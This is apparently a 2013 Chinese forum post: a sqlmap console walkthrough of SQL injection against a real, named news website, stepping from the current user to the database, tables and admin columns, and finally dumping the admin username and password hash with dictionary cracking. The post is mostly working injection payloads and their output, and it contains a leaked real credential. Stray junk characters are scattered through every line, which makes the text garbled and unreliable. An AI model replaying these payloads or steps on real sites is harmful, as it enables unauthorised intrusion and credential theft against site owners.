D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db9 O j# ]5 ?* g1 I3 o% X
ms "Mysql" --current-user /* 注解:获取当前用户名称0 ~7 q& l" c2 h
sqlmap/0.9 - automatic SQL injection and database takeover tool, x+ ?4 I0 O, f4 z8 F. X
http://sqlmap.sourceforge.net starting at: 16:53:541 t- P* h: s _9 J6 h3 W
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
' R% E# E1 @6 f; N session file
9 r6 Y" s. {: w: l* t[16:53:54] [INFO] resuming injection data from session file2 @3 }( o, X/ X9 D8 a
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file/ `( z' x3 ]% D# u6 v
[16:53:54] [INFO] testing connection to the target url# L I' v' b; j. b& N1 `3 L7 w5 \/ i" ?
sqlmap identified the following injection points with a total of 0 HTTP(s) reque1 t# y* X- O8 v6 @% M- e
sts:4 I5 ?' Q/ G: K, r
---" r+ M9 q7 t9 @3 Y1 [6 i; z
Place: GET
/ [. s3 N, k+ e9 B8 f% ?; r- PParameter: id8 T f% _! S; u
Type: boolean-based blind0 q% J- H$ @" e" f4 C& G7 M
Title: AND boolean-based blind - WHERE or HAVING clause
4 d* E( [$ Z g( K4 H+ _ Payload: id=276 AND 799=799
; V4 U" j& _' e" U v Type: error-based$ G6 P$ V d7 F* u6 x- R# y% R
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause( Z! k" l, u7 @4 Q2 F
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# G* B! C j+ e2 X$ c4 p" D
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,583 l, H |- }2 A- K1 b; |
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 Y# g/ i* C G* @
Type: UNION query
# a+ ~6 X9 Y2 t" A; h Title: MySQL UNION query (NULL) - 1 to 10 columns' B9 J3 C8 Y$ H: a5 q7 _4 c& c
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR: I o$ c p9 l% K+ `
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 Q; ~7 g4 _) f
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' ~% x0 R3 }; E8 ?& a: x# A Type: AND/OR time-based blind
5 _& ^6 k- _+ s# q% ` S! a6 ~ Title: MySQL > 5.0.11 AND time-based blind. o) R! n2 a7 E% E t
Payload: id=276 AND SLEEP(5)
6 h7 J" h8 ]- N7 i---
+ X' E2 b7 Y& n6 s- H: }[16:53:55] [INFO] the back-end DBMS is MySQL
1 D+ F* o4 b; R" F, Oweb server operating system: Windows
! W a, P$ E/ n3 Iweb application technology: Apache 2.2.11, PHP 5.3.0
) K" C. F8 Y8 U% bback-end DBMS: MySQL 5.0
: P8 x9 W, U7 V3 U$ Q5 r[16:53:55] [INFO] fetching current user
% H: F# ?# A5 Ycurrent user: 'root@localhost' 4 o# s! U0 `2 ^$ [0 v. s4 z
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou$ d9 c/ o* A- A3 i/ ]" @
tput\www.wepost.com.hk' shutting down at: 16:53:58
! D- U( K* q" d; T4 `
2 w$ ]2 V, @& `8 O+ K: ~ @D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 Y! d$ D0 H. y
ms "Mysql" --current-db /*当前数据库
! x1 A& g$ I* \5 c( _* Q sqlmap/0.9 - automatic SQL injection and database takeover tool
3 }, P* ~4 {/ b, H http://sqlmap.sourceforge.net starting at: 16:54:164 d! i2 @6 f1 N6 X( v
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as+ }, t4 k% ~, I2 |6 w
session file
4 K. B8 N* N: N9 q& B[16:54:16] [INFO] resuming injection data from session file
* B4 Z7 R5 v/ C7 s) Z$ x[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
n4 ^9 f' ~0 O- o4 E8 a; q[16:54:16] [INFO] testing connection to the target url; ~ |+ y! u& d9 z e
sqlmap identified the following injection points with a total of 0 HTTP(s) reque/ Z3 I, f2 {7 i" h/ T/ `
sts:
; a% {6 O7 ]6 i4 n' C/ D- j---
% G) w) M8 H+ S7 lPlace: GET- o# o; O2 F9 T* L0 o
Parameter: id; C. _2 F$ C3 `4 T: R
Type: boolean-based blind5 K* m% l! r- s. J0 m
Title: AND boolean-based blind - WHERE or HAVING clause
' [4 K8 w# e7 N1 Q+ F$ ~5 { Payload: id=276 AND 799=7994 k3 O" n- R- K; h1 G, ^8 Z
Type: error-based4 L0 d# Y+ L3 n. t! Q
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
6 X8 m4 t9 T# ^. h Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 }" F1 S% Q% q) i0 t8 c7 J120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
0 o+ x- d; u' b6 H( W4 {),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
3 e/ V; O9 P7 P- n Type: UNION query* v) o/ s* M k$ U# q
Title: MySQL UNION query (NULL) - 1 to 10 columns! ]4 n- G: u; {( I" o
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR: _& P. X/ f, r& S! p% Z
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
5 d) T0 q& B' @- z( JCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' y. G$ r4 ?, T% r Type: AND/OR time-based blind$ J H- `9 b5 R+ f+ ~
Title: MySQL > 5.0.11 AND time-based blind0 V" _; s6 L7 c9 c
Payload: id=276 AND SLEEP(5)# o# L5 ~$ z; ?; m7 K/ ]7 f5 e
---0 m8 C: N; m* K0 e# i; H2 U
[16:54:17] [INFO] the back-end DBMS is MySQL; h3 f* p$ A9 p! M/ O3 l6 V
web server operating system: Windows7 J1 u$ R* E( n6 E) N# j
web application technology: Apache 2.2.11, PHP 5.3.0
9 N- f9 _$ |/ f1 Pback-end DBMS: MySQL 5.0. J! S, y' E& T) m
[16:54:17] [INFO] fetching current database. k! i5 Q1 `6 j: m/ k7 x
current database: 'wepost'
8 z1 w* y' r/ d- N[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
: M; a! k* y* c) f. W7 Ltput\www.wepost.com.hk' shutting down at: 16:54:18
/ ]6 ?5 @" k' _3 C5 K) r9 qD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, m9 M2 ^. [. g. n' z) N, yms "Mysql" --tables -D "wepost" /*获取当前数据库的表名# d; ~5 @ P% K9 r3 Z( L. s5 Y) B, ?
sqlmap/0.9 - automatic SQL injection and database takeover tool
6 G7 v$ ^& }9 V, N http://sqlmap.sourceforge.net starting at: 16:55:251 M# ^' w1 t; _! s. e: f
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
" o& j: J. g1 `% x, R$ g session file
% i! Y4 F( h. B5 b6 `8 A[16:55:25] [INFO] resuming injection data from session file
3 [4 z) b$ N( V# M! z[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file2 k# c. M7 [: b) M3 n. y
[16:55:25] [INFO] testing connection to the target url2 R( o- k0 _3 Z2 ~
sqlmap identified the following injection points with a total of 0 HTTP(s) reque- d8 o4 z7 S0 T$ o: \
sts:
' `" U( f2 i6 U& j---2 A' i/ x- `6 o0 M
Place: GET* f* g5 D4 \) p- `
Parameter: id
7 r& @* _4 ?: B1 p Type: boolean-based blind) }3 H7 i( I# Q5 s! D" t! D; G- V6 ^
Title: AND boolean-based blind - WHERE or HAVING clause
; F7 k! X( r3 w Payload: id=276 AND 799=7991 f! ], }7 k7 f7 F" i
Type: error-based' s" x1 L" {/ L0 }
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 u2 T U- q8 I4 @9 ]. S8 g Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 y# E8 W {2 O% {2 z
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58; e4 M' B4 @9 Q4 _! H* b
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
( K Q* F" u+ R- A# ~# k Type: UNION query
$ @; e/ R3 j$ M3 F5 R& a Title: MySQL UNION query (NULL) - 1 to 10 columns
# [9 Z# I3 [% G3 d' T* O3 W3 t Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 a9 u1 R7 f+ s7 @( g7 }(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 A! w! s/ K6 |( x
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 U' Z Q* c" o7 c7 B7 T% J Type: AND/OR time-based blind
& G' D% Z0 T' p* e Title: MySQL > 5.0.11 AND time-based blind
5 f8 P% z) z, ]; V; i/ z: Z Payload: id=276 AND SLEEP(5)
' l! @, k" g7 x- s# a5 K+ J; V---
, ]1 T1 A- q8 y# t[16:55:26] [INFO] the back-end DBMS is MySQL/ d) o! R) U% i1 i
web server operating system: Windows( K: |) f" W: ]9 U6 v1 y. h$ D
web application technology: Apache 2.2.11, PHP 5.3.0
: a& I' z. a# F5 a- `back-end DBMS: MySQL 5.0/ M* l! b5 Q) R: c2 {
[16:55:26] [INFO] fetching tables for database 'wepost'
* a) e; ~1 c: r- S6 i[16:55:27] [INFO] the SQL query used returns 6 entries
$ N; l8 L9 m0 ^3 e4 W6 v+ _; PDatabase: wepost
9 f4 d j$ W( Z" T[6 tables]2 T7 a! k. U! D; N, O: ?9 [/ e* Q
+-------------+
W1 x6 A" l8 v- U$ G2 Y( W| admin |' e' f9 w4 Y' p; [, F( q4 z
| article |
6 b6 n5 i0 f8 A( l( V* V2 Y/ X% F| contributor |
" V5 a: e) n6 A) q$ C! {| idea |: T+ x8 [8 g7 k) ~% z/ f, } Q1 E
| image |
: N3 }$ N$ [5 h| issue |
: @& m, k) S) l7 b+-------------+
! `- L, C& t5 M) [[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
. E: h& k! H! A! Z- ^tput\www.wepost.com.hk' shutting down at: 16:55:33
/ b; }. }. B5 J/ o8 p
- ]2 `8 u; o0 l" D5 ^% d2 QD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db/ i( _3 o8 H( `' [6 L
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
! P9 b" j( O; r5 C* d sqlmap/0.9 - automatic SQL injection and database takeover tool9 j& n+ r( X$ a6 J6 h( ^+ y
http://sqlmap.sourceforge.net starting at: 16:56:06! B; d2 W t6 \$ x) l
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
: G: B% j4 A4 \! |sts:2 u [! v- E D& I- z
---* l0 o- l6 s% L6 t* q: N ]
Place: GET
1 x8 Q7 |$ t! ~% u1 [Parameter: id
( ^! G i* g' `3 T. [ Type: boolean-based blind* A* b3 o$ j' b" E! \( l6 ?$ @/ h
Title: AND boolean-based blind - WHERE or HAVING clause
- L8 }" y5 x% z3 J* j4 b- E Payload: id=276 AND 799=799$ G/ y! n/ Y6 I& p; |8 I
Type: error-based
6 o8 A5 Y2 @1 |0 L Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
; x L$ O& k$ Y: A2 [ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' U( L! s: N C/ s, W5 j5 Q' }120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
* [- {+ }' G3 u: q$ \& [/ S- t),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 L$ X4 b5 c5 E) @6 B# z. y: @
Type: UNION query
" J0 E l7 q+ B- b Title: MySQL UNION query (NULL) - 1 to 10 columns; k4 {8 z; G) h# ^
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
* c( n! o. c2 ?$ K% e(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
3 p% U, K. L5 G y. D: S2 OCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
0 J4 O+ _% A( A3 w Type: AND/OR time-based blind3 g# W7 a' D' P% p/ @% q
Title: MySQL > 5.0.11 AND time-based blind+ Y5 b, B( W. \3 l) }1 d. Y
Payload: id=276 AND SLEEP(5)& J# u5 D5 Z7 H
--- u' ^% Y; p5 U' x3 ]: D5 ~
web server operating system: Windows+ ~% U) i5 W! v/ T/ f
web application technology: Apache 2.2.11, PHP 5.3.0
$ g* Z, j1 t vback-end DBMS: MySQL 5.0
: L7 x7 Y0 f3 Q/ V( K[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se+ V& H9 z) |; y5 {
ssion': wepost, wepost
7 ~: S- `, l; F! {" t$ w: [3 v7 T3 GDatabase: wepost
/ ^% }) K1 P5 t. lTable: admin# D$ _! ^2 j/ v/ Q" g/ }
[4 columns]- G& d/ z, P0 M! B8 y# Y- ^5 t3 F
+----------+-------------+
* n4 D+ ~: |1 Y# T( \| Column | Type |" m6 l& u+ \$ m1 z& L
+----------+-------------+
4 P) V5 x! d0 e8 c/ c| id | int(11) |! R6 q' b: M0 e F
| password | varchar(32) |
, I ?& c5 x& u1 C| type | varchar(10) |
, A/ D; x! U7 P| userid | varchar(20) |. j4 T8 }. p) ^6 H' }7 `
+----------+-------------+
7 M3 y4 \- }4 A shutting down at: 16:56:19
; f7 \" d8 |% ?; r9 D* q- L8 h1 }3 T1 Z
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! h1 F9 b8 [6 r& K: M: |' t
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
$ p, w0 F! q7 F sqlmap/0.9 - automatic SQL injection and database takeover tool( n1 X# {! i' [
http://sqlmap.sourceforge.net starting at: 16:57:142 d+ ?! w. r$ H( p
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
0 L, M7 P4 b, c4 f9 ksts:: \9 d3 {% ?( `7 \/ W
---$ W+ p1 G: v" O
Place: GET+ i5 M0 J, U& t6 V
Parameter: id
8 E3 W/ M; k, L: {7 u Type: boolean-based blind) K7 Y. X# }& T
Title: AND boolean-based blind - WHERE or HAVING clause3 M9 R' n6 V% u8 b: ^; C& p
Payload: id=276 AND 799=799' G: e' x2 }: L5 l" H- d
Type: error-based
5 \- M- i$ P: q* D* A Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 k- a4 R4 o. \7 j Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,/ J) D! Q3 f( a" S
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
4 }) P3 P7 x% ~: n$ j2 L),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 y0 E- O) P" _2 ^0 v
Type: UNION query. C; l' e/ Q; q" ~3 n1 I
Title: MySQL UNION query (NULL) - 1 to 10 columns* c# k2 U& A5 ?# b/ s' p
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR/ U2 m+ y% u+ |3 `$ @: g1 H: O
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ n# r1 E' M8 W0 C) pCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 f: C r2 y! @7 H
Type: AND/OR time-based blind
+ p3 J# s- j# g; ~ Title: MySQL > 5.0.11 AND time-based blind
9 |0 h: P, I% {9 w6 |- q w0 x Payload: id=276 AND SLEEP(5)3 b& D7 n6 p, W+ j, O
---4 I* _3 g# K" }% o' x1 ]
web server operating system: Windows ]. F6 W, j) G
web application technology: Apache 2.2.11, PHP 5.3.0# e6 n; s- n" k% P x$ P. b
back-end DBMS: MySQL 5.0
9 G$ K3 _( F) ^2 T( Crecognized possible password hash values. do you want to use dictionary attack o
4 K# Q0 P j: |n retrieved table items? [Y/n/q] y* N7 E; P k, w: Y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
* D9 K; Y+ K5 @. N8 Cdo you want to use common password suffixes? (slow!) [y/N] y9 P1 x3 b. d3 |2 H& [% Q
Database: wepost3 X# X$ X6 W, b7 _0 x4 P$ U! a# [9 ]
Table: admin
' C0 M4 O) F# ]. n! t8 D# P S[1 entry]
) [8 j# e* ^' H( E* N+----------------------------------+------------+
9 C5 Q8 r: q1 s; G| password | userid |
$ Z- v+ S3 }& S) p' G! S, [. @+----------------------------------+------------+- R' e* C4 p5 \8 ^
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |+ y2 c3 p% r) Y4 v
+----------------------------------+------------+
% c5 {( H. t* f1 U7 D: P; _ shutting down at: 16:58:14
2 }; {+ m8 y. m# J
1 o$ D6 o( `" T; o" p+ {D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
分享
支持
反对